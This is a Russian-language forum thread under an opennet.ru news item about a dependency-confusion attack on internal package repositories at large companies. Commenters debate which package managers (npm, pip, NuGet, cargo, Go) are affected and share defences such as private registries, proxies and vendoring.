Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

"Атака на зависимости позволила выполнить код на серверах PayPal, Micrоsoft, Apple, Netflix, Uber и ещё 30 компаний"	+/–
Сообщение от opennews (?), 10-Фев-21, 11:03
Представлен поразительный по своей простоте метод атаки на зависимости в приложениях, при разработке которых используются внутренние репозитории пакетов. Выявившие проблему исследователи смогли выполнить свой код на внутренних серверах 35 компаний, среди которых  PayPal, Micrоsoft, Apple, Netflix, Uber, Tesla и Shopify. Взломы проводились в рамках программ Bug Bounty, согласованно с атакуемыми компаниями, и уже принесли авторам 130 тысяч долларов, выплаченных в форме вознаграждений за выявление уязвимостей (выплаты продолжают поступать)... Подробнее: https://www.opennet.me/opennews/art.shtml?num=54566
Ответить | Правка | Cообщить модератору

Сообщения

[Сортировка по ответам | RSS]

1. Сообщение от Leftpad (?), 10-Фев-21, 11:03	+55 +/–
Нужно больше зависимостей и скриптов установки.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #3, #8, #10, #38, #48, #153, #200

2. Сообщение от Леголас (ok), 10-Фев-21, 11:06	+9 +/–
всё гениальное просто
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #51

3. Сообщение от Лудакрис (?), 10-Фев-21, 11:08	–12 +/–
нужно больше содержательных комментариев на опеннет.ру
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #6

4. Сообщение от DildoZilla (?), 10-Фев-21, 11:14	–6 +/–
Всё ещё проще -- надо было просто придумать гит и гитхабы. Смузисосы-линуксоиды, падкие на всякие цацки, а особенно на всякие там пакетирования, сами всё туда сольют. Ловись гитхабер большой и маленький.
Ответить | Правка | Наверх | Cообщить модератору

5. Сообщение от Аноним (5), 10-Фев-21, 11:15	–2 +/–
Дыра. Раста проблема тоже касается?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #18, #25, #30, #35, #156, #199

6. Сообщение от Аноним (6), 10-Фев-21, 11:15	–4 +/–
Нужно больше коментариев пытающихся в сарказм
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #3 Ответы: #12, #58

7. Сообщение от тоже Аноним (ok), 10-Фев-21, 11:17	+13 +/–
Рекомендации по защите не работают. Работает только система, которая безопасна из коробки и требует чтения рекомендаций для того, чтобы сделать ее небезопасной.
Ответить | Правка | Наверх | Cообщить модератору

8. Сообщение от Аноним (8), 10-Фев-21, 11:18	+11 +/–
Не зря же в расте даже базовые возможности - во внешних модулях. Растаманы приготовили благодатную почву...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #65

10. Сообщение от Аноним (10), 10-Фев-21, 11:20	+9 +/–
Больше зависимостей богу зависимостей! Да здравствует leftpad.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #101, #180

11. Сообщение от Lex (??), 10-Фев-21, 11:20	+1 +/–
> Проблема в том, что пакетные менеджеры, такие как npm .. пытаются загрузить внутренние зависимости компаний в том числе и из публичных репозиториев Они что, объявляли их просто как пакеты, а не ссылкой на каталог/файл типа file:// или ссылки на конкретную гитОвую репу типа git://github.com/<user>/<project>.git#<branch> !? -Если так, то руководителей отделов разработки тех контор надо гнать сс.ными тряпками, поскольку в противном случае пакет вообще почти откуда угодно может стягиваться даже просто ввиду случайного совпадения имен
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #40, #118

12. Сообщение от Лудакрис (?), 10-Фев-21, 11:31	–5 +/–
будь осторожен в своих желаниях: мой сарказм обладает силой, разрушающей любую логику
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6

14. Сообщение от ryoken (ok), 10-Фев-21, 11:32	+1 +/–
Так им всем и надо.
Ответить | Правка | Наверх | Cообщить модератору

18. Сообщение от Лудакрис (?), 10-Фев-21, 11:36	+1 +/–
а есть упоминание? читайте внимательнее, глупые аноны, это нелегко, знаю, но пытайтесь!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #21, #22, #49

21. Сообщение от Аноним (21), 10-Фев-21, 11:41	+/–
Нет упоминанй, потому что Растом и его пакетником в не пользуются?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18

22. Сообщение от Аноним (5), 10-Фев-21, 11:42	+/–
Не хами!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18

23. Сообщение от Аноним (-), 10-Фев-21, 11:46	+1 +/–
> а также внутренние зависимости, которые не распространяются публично и загружаются из собственных репозиториев. Руст или вообще какой-нибудь петон. Мы то знаем.
Ответить | Правка | Наверх | Cообщить модератору

24. Сообщение от Аноним (24), 10-Фев-21, 11:51	+/–
А как они узнали их имена ?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #26, #29, #31

25. Сообщение от Ананимус (?), 10-Фев-21, 11:53	+2 +/–
Нет, там нужно указывать registry, откуда качать пакет.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5

26. Сообщение от Аноним (24), 10-Фев-21, 11:55	+3 +/–
> как исследователь случайно обратил внимание, что в публикуемом на GitHub общедоступном коде многие компании не очищают из manifest-файлов упоминание дополнительных зависимостей, применяемых во внутренних проектах или при реализации расширенной функциональности. А если кто то забудет там пароли ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24 Ответы: #197

27. Сообщение от bsdun (?), 10-Фев-21, 11:58	+2 +/–
Использовали бы FreeBSD и её дерево портов, проблем бы не было!
Ответить | Правка | Наверх | Cообщить модератору

28. Сообщение от kissmyass (?), 10-Фев-21, 11:58	–1 +/–
Я тоже немного офигел когда приватные пакеты искались на nuget.org Самый очевидный но не самый простой способ на мой взгляд это юзать что-то типа Sonatype Nexus и проксировать nuget.org... полностью убрав nuget.org из списка источников.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #86

29. Сообщение от kissmyass (?), 10-Фев-21, 12:02	+3 +/–
ну например если дотнет то прям в файле проекта <PackageReference Include="Fck.U.MS" Vesion="666-go-to-hell-beta2" />
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24 Ответы: #85

30. Сообщение от cheater (?), 10-Фев-21, 12:03	+5 +/–
Не раста, а cargo. Именно эта не касается, тк. зависимости качаются по дефолту с crates.io, если явно не сказано иное. Проблемам компрометации пакетов cargo подвержен так же как и все остальные, например если указать в конфиге Cargo.toml version ">=0.2" то никто не мешает скомпрометировать v0.3 в репозитории
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #32, #34

31. Сообщение от kissmyass (?), 10-Фев-21, 12:04	+/–
а если доступа к коду нет, но есть к бинарникам, то обычно одна ассембли - один nuget пакет
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #24

32. Сообщение от Аноним (5), 10-Фев-21, 12:09	+3 +/–
Да, это проблема и не только cargo, но и всего раста, потому что все используют cargo. В общем, недостатки - это продолжение достоинств. Хотелось бы, чтобы появилась полноценная возможность опираться в пакетах (крейтах) только на то, что идет с самим дистрибутивом линукса, не компрометируя себя связями с единственным иностранным внешним репозиторием. Обычно всем пофиг на это, но есть области программирования, где совсем не пофиг. Короче, исходная тема новости лишний говорит, что бесплатного сыра [в мышеловке] не бывает.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #30 Ответы: #37

33. Сообщение от Fracta1L (ok), 10-Фев-21, 12:10	+1 +/–
Зависимости эт плохо пнятненько
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #148

34. Сообщение от Аноним (68), 10-Фев-21, 12:22	+/–
Если у тебя конечно есть доступ к репозиторию.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #30

35. Сообщение от Аноним (68), 10-Фев-21, 12:24	–4 +/–
А при чем тут Раст? Он же не скриптовый вроде
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #5 Ответы: #59

36. Сообщение от qweqwe (?), 10-Фев-21, 12:27	+1 +/–
composer у php не подвержен такой бяке?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #88

37. Сообщение от Siborgium (ok), 10-Фев-21, 12:28	+1 +/–
cargo умеет работать с git-репозиториями и локальными пакетами.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #32 Ответы: #39, #41

38. Сообщение от Dzen Python (ok), 10-Фев-21, 12:50	+/–
Нужно больше васянских библиотек и костылей "на вызов одной функции"
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #184

39. Сообщение от Dzen Python (ok), 10-Фев-21, 12:53	–2 +/–
И? На локальные пакеты он сможет сослаться в уже скомпилированном состоянии? А на локальные системные либы при сборке? Или для этого все равно нужно тянуть обертки с крейтс? Просто интересно
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37 Ответы: #68, #78

40. Сообщение от Dzen Python (ok), 10-Фев-21, 12:54	–2 +/–
Ты что! Там жЫ уважаемые девляпсы и сениоры! Они такой код пишуть - аж закачаешься (от эмоций!)!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11 Ответы: #54

41. Сообщение от Аноним (5), 10-Фев-21, 12:54	+3 +/–
Мне интереснее, а можно ли при сборке приложения с помощью cargo использовать только то, что идет с дистрибутивом, вообще, не залезая в интернет (например, если это запрещено или даже, если нет интернета)?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #37 Ответы: #70, #128, #134, #149

42. Сообщение от Аноним (42), 10-Фев-21, 12:54	+3 +/–
>многие компании не очищают из manifest-файлов упоминание дополнительных зависимостей Защита методом "безопасность через неясность" - говно. В нормальных компаниях просто с публичных репозиториев ничего не ставится. Ставится со своего, все чужие пакеты в котором проверены службой безопасности.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #43, #44, #46, #87

43. Сообщение от Аноним (-), 10-Фев-21, 12:57	+3 +/–
Это где так ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42 Ответы: #151

44. Сообщение от Dzen Python (ok), 10-Фев-21, 12:58	–2 +/–
В нормальных компаниях к тому моменту, когда они выкладывают код/имеют зрелый продукт на руках уже есть набор нормальных опенсорцных .so'шников ИЛИ свой набор отлаженных, оптимизированных homebrew-либ. Ни или в сама крайнем случае - нормальная купленная библитека на внутреннем сервере. А не набор васянских лефтпадов из NPM
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42

45. Сообщение от Gogi (??), 10-Фев-21, 13:02	+2 +/–
Этот случай только лишний раз доказывает ущербность идеи "автоматических пакетов". Сеть априори считается ОПАСНЫМ местом. А вы оттуда тягаете пакеты на автомате и надеетесь, что хакеры это пропустят?? :) Я уже несколько лет выступаю против нюГетов и подобных rовноподелий - им не место в продакшене! Для самопальных перделок - ради бога, но где идёт коммерческое ПО - сразу вон поганой метлой!
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #47, #89, #139, #171

46. Сообщение от Аноним (46), 10-Фев-21, 13:05	+1 +/–
Если уж этим на "проверены службой безопасности" не хватает, то где тогда "нормальные" водятся?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42

47. Сообщение от Аноним (-), 10-Фев-21, 13:06	+/–
Может наоборот ? Там где комерческое - то пофиг, барин то платит.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45 Ответы: #114

48. Сообщение от Аноним (48), 10-Фев-21, 13:08	+7 +/–
Правильно, если у тебя в большом проекте 1 000 000 однострочников и ты использовал этот проект как платформу для 1000 других проектов, то весь код между проектами нужно копировать. И не в коем случае не использовать менеджеры зависимости! И когда ты фиксишь например 100 функций-однострочников в одном проекте, то все их вручную нужно копировать в 100 других проектов. Гениально, надо продвигать эту идею в массы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #1 Ответы: #84, #102, #185

49. Сообщение от Аноним (48), 10-Фев-21, 13:12	+1 +/–
Я не тот анон, но там написано "в других системах, таких как..." и дальше приводится пример (именно пример, а не весь список!!!) систем "таких как". То есть из текста следует, что проблеме может быть подвержен любой менеджер зависимостей даже если он не перечислен в данной статье.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #18 Ответы: #113

50. Сообщение от Андрей (??), 10-Фев-21, 13:13	+2 +/–
Так я и не понял, это баг или фича.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #60, #62

51. Сообщение от AHOHUM (?), 10-Фев-21, 13:14	–2 +/–
Природа красива в простоте сложности и сложности простоты. Не удаётся скрыться от сложности в простоту.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #2 Ответы: #194

52. Сообщение от Аноним (58), 10-Фев-21, 13:15	–2 +/–
И как раст от такого спасет? А вы говорите безопасный язык. А раст такая же дырень со своим крейтсом.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #63, #172

54. Сообщение от AHOHUM (?), 10-Фев-21, 13:20	+3 +/–
Не пишуть! А рисуютЪ!!! :)) Баги фиксят в продукте исправлением пары строк в конфигурации запуска. Как стройбат: такие звери, что даже автомат не выдают.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #40

55. Сообщение от Аноним (55), 10-Фев-21, 13:21	–1 +/–
Не глупо ли это само по себе - выкладывать на публику проекты, зависящие от неопубликованных библиотек.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #91

58. Сообщение от Аноним (58), 10-Фев-21, 13:24	+1 +/–
Нужно больше подстрекателей к сарказму.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #6

59. Сообщение от pda (?), 10-Фев-21, 13:26	+/–
Проблема не в языках, а в пакетных менеджерах.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #35

60. Сообщение от Аноним (58), 10-Фев-21, 13:27	+1 +/–
Это фича. А сабж это атака через фичу. Почти что социнженерия.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #50

61. Сообщение от Аноним (61), 10-Фев-21, 13:27	+1 +/–
запускайте npm/pip/gems install на машинах разработчиков без изоляции, он вам и shell установит пользователям для кражи ssh-keys агента и вместе с вашими криптокошельками и рабочими местами.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #125

62. Сообщение от Аноним (62), 10-Фев-21, 13:28	–1 +/–
Это квантовое программирование, багофича Шредингера. Будущее наступило.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #50

63. Сообщение от pda (?), 10-Фев-21, 13:30	+/–
crate не подвержен этой проблеме.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #52 Ответы: #73

64. Сообщение от JL2001 (ok), 10-Фев-21, 13:30	+2 +/–
чо там, пацаны, давно в vlc-ppa публиковали linux-generic-7.0.1 ?
Ответить | Правка | Наверх | Cообщить модератору

65. Сообщение от Аноним (65), 10-Фев-21, 13:30	+5 +/–
https://www.reddit.com/r/rust/comments/lgl7bf/is_cargo_vulne.../
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #8 Ответы: #147

66. Сообщение от JL2001 (ok), 10-Фев-21, 13:36	–2 +/–
> добавив в скрипт, запускаемый перед началом установки (preinstall в NPM), код для сбора информации о системе и отправки полученных сведений на внешний хост pred/post-install запускать от рута, говорили они, ничего не будет, всегда так делали, говорили они ей, пацаны с репозиториями, вас там ещё не во все дыры? мантейнеры успевают все патчи мониторить, или как с Kubernetes - напихали с гита в пакет, и всё отлично?
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #76

68. Сообщение от Аноним (68), 10-Фев-21, 13:38	+1 +/–
В уже скомпилированном состоянии он будет содержать крейты в себе. Раст все растовые (в т.ч. удаленные крейты) зависимости вкомпиливает статически. В нем нет динамической линковки, поскольку нет стабильно ABI https://github.com/rust-lang/rfcs/issues/600 . Динамическая линковка доступна только при FFI (с либами, написанными на других языках) Лично мне это нравится благодаря достигаемой скорости исполнения при использовании LTO. Понимаю тех, у кого места на диске мало. Или кому нужно множество связанных раст-процессов запускать.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39 Ответы: #79, #186

70. Сообщение от Аноним (68), 10-Фев-21, 13:43	+1 +/–
Позволен git, путь, и crates.io. Можно создать свой https://github.com/rust-lang/crates.io если вы совсем большие, и указать в проекте адрес на него.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #41 Ответы: #72, #119

71. Сообщение от PetrG (ok), 10-Фев-21, 13:44	+3 +/–
Мой любимый кошмар на работе - почти каждый проект закачивает пол интернета при сборке. И мало кто понимает что там.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #93

72. Сообщение от Аноним (68), 10-Фев-21, 13:45	–1 +/–
Называется это (crates.io) registry https://doc.rust-lang.org/cargo/reference/registries.html
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #70

73. Сообщение от Платные Эксплоиты и Шифровальщики (?), 10-Фев-21, 13:47	–4 +/–
Исследования по crate в закрытом доступе, оплата на Patreon.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #63

74. Сообщение от Аноним (74), 10-Фев-21, 13:49	+/–
А как же Perl? :3
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #75, #81

75. Сообщение от Аноним (61), 10-Фев-21, 13:50	+/–
Залатали временно
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #74

76. Сообщение от Аноним (61), 10-Фев-21, 13:50	+1 +/–
Оно и без рута отлично линукс юзерам установит сервисы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #66

77. Сообщение от Аноним (77), 10-Фев-21, 13:55	+/–
вот тебе и DevУпс!
Ответить | Правка | Наверх | Cообщить модератору

78. Сообщение от cheater (?), 10-Фев-21, 13:57	+2 +/–
> На локальные пакеты он сможет сослаться в уже скомпилированном состоянии? Вопрос некорректен, тк скомпилированный бинарник на расте - это обычный ELF или PE32 или какой там бинарный формат на целевой платформе. Он может динамически линковаться с системными .so файлами, а также с растовыми .so (динамическими библиотеками с растовым ABI а не C ABI). См. https://users.rust-lang.org/t/what-is-the-difference-between... > А на локальные системные либы при сборке? Да, см. https://doc.rust-lang.org/reference/items/external-blocks.ht...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #39

79. Сообщение от Аноним (8), 10-Фев-21, 13:58	–2 +/–
> В нем нет динамической линковки, поскольку нет стабильно ABI Карл, а что делали растаманы 15 лет?!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #68 Ответы: #90

80. Сообщение от Аноним (80), 10-Фев-21, 14:01	+/–
Очевидная атака. Удивительно что такие компании при сборке используют зависимости с инетов и не проверяют даже их подписи. Всегда пишу eбылды и скачиваю все необходимые пакеты задолго до начала сборки.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #82, #116

81. Сообщение от Аноним (81), 10-Фев-21, 14:06	+2 +/–
> А как же Perl? :3 Вернули домен
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #74 Ответы: #189

82. Сообщение от Аноним (61), 10-Фев-21, 14:06	+1 +/–
Проверки подписи не у всех есть, да и проверяет вначале публичные репы и только потом приватные. Компании сами должен присылать патчи.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80 Ответы: #110

83. Сообщение от Аноним (74), 10-Фев-21, 14:07	+4 +/–
Для пистона это норма. Даже прожекты с мегатоннами звест на гитхубе, имеют мегатонны же проблем с зависимостями и всякого дерьма в своем составе. npm уже вообще что-то вроде мема. Go ждёт такое же будущее ибо язык рассчитан на идиотов. Это не значит что на нём пишут токма дураки, но даун-френдли политика, не доводит до добра.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #92

84. Сообщение от YetAnotherOnanym (ok), 10-Фев-21, 14:19	+11 +/–
Вообще-то, когда приходится фиксить сотни чужих пакетов, это достаточный повод сесть, подумать, и выбрать какую-то более другую платформу.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48 Ответы: #183

85. Сообщение от Аноним (24), 10-Фев-21, 14:20	–1 +/–
В смысле ? Разве оно первым делом не локальный файл ищет ? Весь смысл подобных штук,  проксей, кешей и т.д. в начале ЭТО ищут локально и если нет то тогда уже  в ...
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #29 Ответы: #100

86. Сообщение от JL2001 (ok), 10-Фев-21, 14:21	+/–
> Я тоже немного офигел когда приватные пакеты искались на nuget.org > Самый очевидный но не самый простой способ на мой взгляд это юзать > что-то типа Sonatype Nexus и проксировать nuget.org... полностью убрав nuget.org из > списка источников. а Nexus не накачает с nuget.org более новых версий, чем локальные??
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #28 Ответы: #103

87. Сообщение от JL2001 (ok), 10-Фев-21, 14:23	+/–
> Ставится со своего, все чужие пакеты в котором проверены службой безопасности. втф? ловите эльфа/наркомана!!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #42 Ответы: #106

88. Сообщение от Аноним (88), 10-Фев-21, 14:24	+/–
Если сам не наделаешь
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #36

89. Сообщение от JL2001 (ok), 10-Фев-21, 14:28	–1 +/–
> Этот случай только лишний раз доказывает ущербность идеи "автоматических пакетов". Сеть > априори считается ОПАСНЫМ местом. А вы оттуда тягаете пакеты на автомате > и надеетесь, что хакеры это пропустят?? :) > Я уже несколько лет выступаю против нюГетов и подобных rовноподелий - им > не место в продакшене! Для самопальных перделок - ради бога, но > где идёт коммерческое ПО - сразу вон поганой метлой! а линуксы в продакшене ты как обновляешь, братюнь? зы: какова ответственность редхата за появление в его репозитории дырявого или протрояненого самим автором программы пакета?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #45 Ответы: #115, #124

90. Сообщение от Ordu (ok), 10-Фев-21, 14:30	–2 +/–
Ничего не делали, я уже говорил в соседнем топике. Раскручивали язык, чтобы взять приз "most loved language" на stackoverflow.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #79

91. Сообщение от JL2001 (ok), 10-Фев-21, 14:32	+3 +/–
> Не глупо ли это само по себе - выкладывать на публику проекты, > зависящие от неопубликованных библиотек. они и не выкладывают в манифесте внутри опубликованного "бинарника" осталась инфа о том, из чего он собран, включая внутренние пакеты
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #55

92. Сообщение от Аноним (58), 10-Фев-21, 14:44	–1 +/–
Ну все значит нам нужна единая платформа, которая будет монолитна полностью запрещающая сторонние зависимости и имеет богатую дефолтную библиотеку. Только как её сделать?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #83 Ответы: #97, #104

93. Сообщение от Аноним (58), 10-Фев-21, 14:46	+1 +/–
Выкачать всё в локальный репозиторий, сделать локальные пакеты. Запретить качать из инета, но не полностью. И ждать когда из интернет к тебе прилетит его клон.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #71 Ответы: #99

94. Сообщение от Аноним (24), 10-Фев-21, 14:54	–2 +/–
А что разве в GO уже переделали ? Раньше в GO чтобы цеплять файлы с гитхаба нужно было писать "github.com/mattn/go-sqlite3"
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #112, #181

96. Сообщение от Оуноуним (?), 10-Фев-21, 14:56	+1 +/–
Чем проще разработка, тем проще эксплуатация уязвимостей.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #98

97. Сообщение от Аноним (97), 10-Фев-21, 14:56	+2 +/–
Может не нужна платформа, а достаточно просто научиться программировать и делать зеродеп проги весом в десяток килобайт ? Или так не учили ?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #92 Ответы: #108

98. Сообщение от Аноним (24), 10-Фев-21, 14:58	–1 +/–
Тем проще ее заметить. Вон в ядре поди чего только нет ... исходники то открыты а толку от этого.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #96 Ответы: #126

99. Сообщение от Аноним (61), 10-Фев-21, 14:58	+4 +/–
Чем отличается фиксация пакетов с малварями от скачивания актуальной версии малвари?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #93 Ответы: #107

100. Сообщение от kissmyass (?), 10-Фев-21, 15:03	+/–
> В смысле ? Разве оно первым делом не локальный файл ищет ? > Весь смысл подобных штук,  проксей, кешей и т.д. в начале ЭТО > ищут локально и если нет то тогда уже  в ... Локально это где? Nuget пакет не поставляется с самим проектом.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #85

101. Сообщение от Аноним (-), 10-Фев-21, 15:04	+/–
Да здравствует Haskell!
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #10

102. Сообщение от Аноним (102), 10-Фев-21, 15:06	+1 +/–
Так писали наши деды. Раньше позорным считалось переиспользование кода не только в соседних отделах, но даже в рамках одной программы. Если ты не можешь написать оригинальный код ad-hoc, то ты даже не программист, ты просто макака-копипастер.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #48 Ответы: #157, #205

103. Сообщение от kissmyass (?), 10-Фев-21, 15:09	–1 +/–
>> Я тоже немного офигел когда приватные пакеты искались на nuget.org >> Самый очевидный но не самый простой способ на мой взгляд это юзать >> что-то типа Sonatype Nexus и проксировать nuget.org... полностью убрав nuget.org из >> списка источников. > а Nexus не накачает с nuget.org более новых версий, чем локальные?? Насколько я знаю, там надо апрувить пакеты на кеширование. Если пакета нет, то пофик какой версии его нет ))) Он заберется из приватной репы.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #86 Ответы: #109

104. Сообщение от Аноним (74), 10-Фев-21, 15:15	+/–
Проблема не в зависимостях, а в навыках и культуре разработки, которые хромают у упомянутых язычков
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #92 Ответы: #187

105. Сообщение от Erley (ok), 10-Фев-21, 15:23	+4 +/–
Странно что никто не озадачился проверкой базовых образов на которых собираются докер-контейнеры. Часто вижу как люди там используют какие-то мутные сборки убунты и тп. Вот где раздолье для хакеров! Если уж качать бинарник из веба, то из проверенного источника и с проверкой подписи/хэша хотя бы.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #144

106. Сообщение от www2 (??), 10-Фев-21, 15:33	+3 +/–
Пользователи Windows, скачавшие её с торрентов у Васяна и потом качающие на неё софт с кряками по первой ссылке из поиска - вот настоящие эльфы и наркоманы. Самые серьёзные люди используют списки контроля доступа, системны мандатного доступа и сертифицированные операционные системы, поставить на которые обновлённый пакет - значит лишиться сертификации. Новость тут в том, что даже качая из официального источника, проверяя хэш-суммы и цифровые подписи скачанного, можно всё равно нарваться на подлог из-за неправильно выставленных (или не выставленных вовсе) приоритетов источников.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #87 Ответы: #132

107. Сообщение от JL2001 (ok), 10-Фев-21, 15:50	+1 +/–
> Чем отличается фиксация пакетов с малварями от скачивания актуальной версии малвари? типо о старых версиях типо уже должна была поднятья шумиха, если что :)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #99 Ответы: #142

108. Сообщение от JL2001 (ok), 10-Фев-21, 15:52	–1 +/–
> Может не нужна платформа, а достаточно просто научиться программировать и делать зеродеп > проги весом в десяток килобайт ? Или так не учили ? а вас то научили как коммунизм построить?
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #97

109. Сообщение от JL2001 (ok), 10-Фев-21, 15:55	+/–
>>> Я тоже немного офигел когда приватные пакеты искались на nuget.org >>> Самый очевидный но не самый простой способ на мой взгляд это юзать >>> что-то типа Sonatype Nexus и проксировать nuget.org... полностью убрав nuget.org из >>> списка источников. >> а Nexus не накачает с nuget.org более новых версий, чем локальные?? > Насколько я знаю, там надо апрувить пакеты на кеширование. > Если пакета нет, то пофик какой версии его нет ))) > Он заберется из приватной репы. возможно от настроек зависит, наш выкачивает автоматом
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #103

110. Сообщение от Аноним (110), 10-Фев-21, 15:59	+1 +/–
Скачивают руками, локально и только потом собираю. Шарится по сторонним репам все равно что кирпичем на минном поле футбол играть.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #82

111. Сообщение от Брат Анон (ok), 10-Фев-21, 16:09	–1 +/–
Так-то вендоринг в golang великая сила)) Правда, это тоже не спасёт, если внешний пакет во время работы проги полезет в сеть хозяевам стучать (если админ -- снежинка с руками из от туда).
Ответить | Правка | Наверх | Cообщить модератору

112. Сообщение от Брат Анон (ok), 10-Фев-21, 16:10	+1 +/–
`go mod vendor` тебе в помощь. В голанге не так.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #94

113. Сообщение от An O Nim (?), 10-Фев-21, 16:13	+3 +/–
Проблема ещё шире: переменчивость артефактов во внешних сетях. Человеки делают неустойчивые системы. За первую половину молодости ооочень много кому не случается встретить, но эффект есть и существует - системы неустойчивы, могут исчезать или нужные подменяться на ненужные.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #49 Ответы: #195

114. Сообщение от An O Nim (?), 10-Фев-21, 16:18	+/–
Считается, что так тоже не катит. Т.к. в полезного в коммерческом вырастет тот, кто заботится. Двуличка с хорошим результатом - редкость. Кому пофиг - халтурщики. Они уходят на сторону или не растут.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #47

115. Сообщение от An O Nim (?), 10-Фев-21, 16:24	–2 +/–
Редхат как раз и есть внутренние штатные репо самого дистра RHE Линукс. Репы RHEL как раз внутренние репо самого RHEL. А вот бездумное добавление в yum-dnf.conf реп третьих сторон даст уязвимость как в новости. И некоторые и так тоже делают... Всякие там PPA репо и прочие с хабров и т.п. "авторитетных" площадок. Шапкины репы - внутренние для Шапки. Тут-то очень всё норм.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #89 Ответы: #133

116. Сообщение от Страдивариус (?), 10-Фев-21, 16:46	+2 +/–
Анониму всё очевидно, но 130К грина ушло опять не ему =)
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #80

117. Сообщение от Аноним (117), 10-Фев-21, 17:01	–1 +/–
Хахаха. npn, pip , rubygems. В следующем выпуске ржавый карго. Бугага. Сейчас его там нет только потому что на rust ещё ничего не сделали.
Ответить | Правка | Наверх | Cообщить модератору
Ответы: #127

118. Сообщение от YetAnotherOnanym (ok), 10-Фев-21, 17:07	+1 +/–
Скорее уволят начотдела, у которого програмеры пишут недостаточно быстро.
Ответить | Правка | Наверх | Cообщить модератору
Родитель: #11

119. Сообщение от Аноним (119), 10-Фев-21, 17:14	+1 +/–
написал вместо того что бы сказать нет.
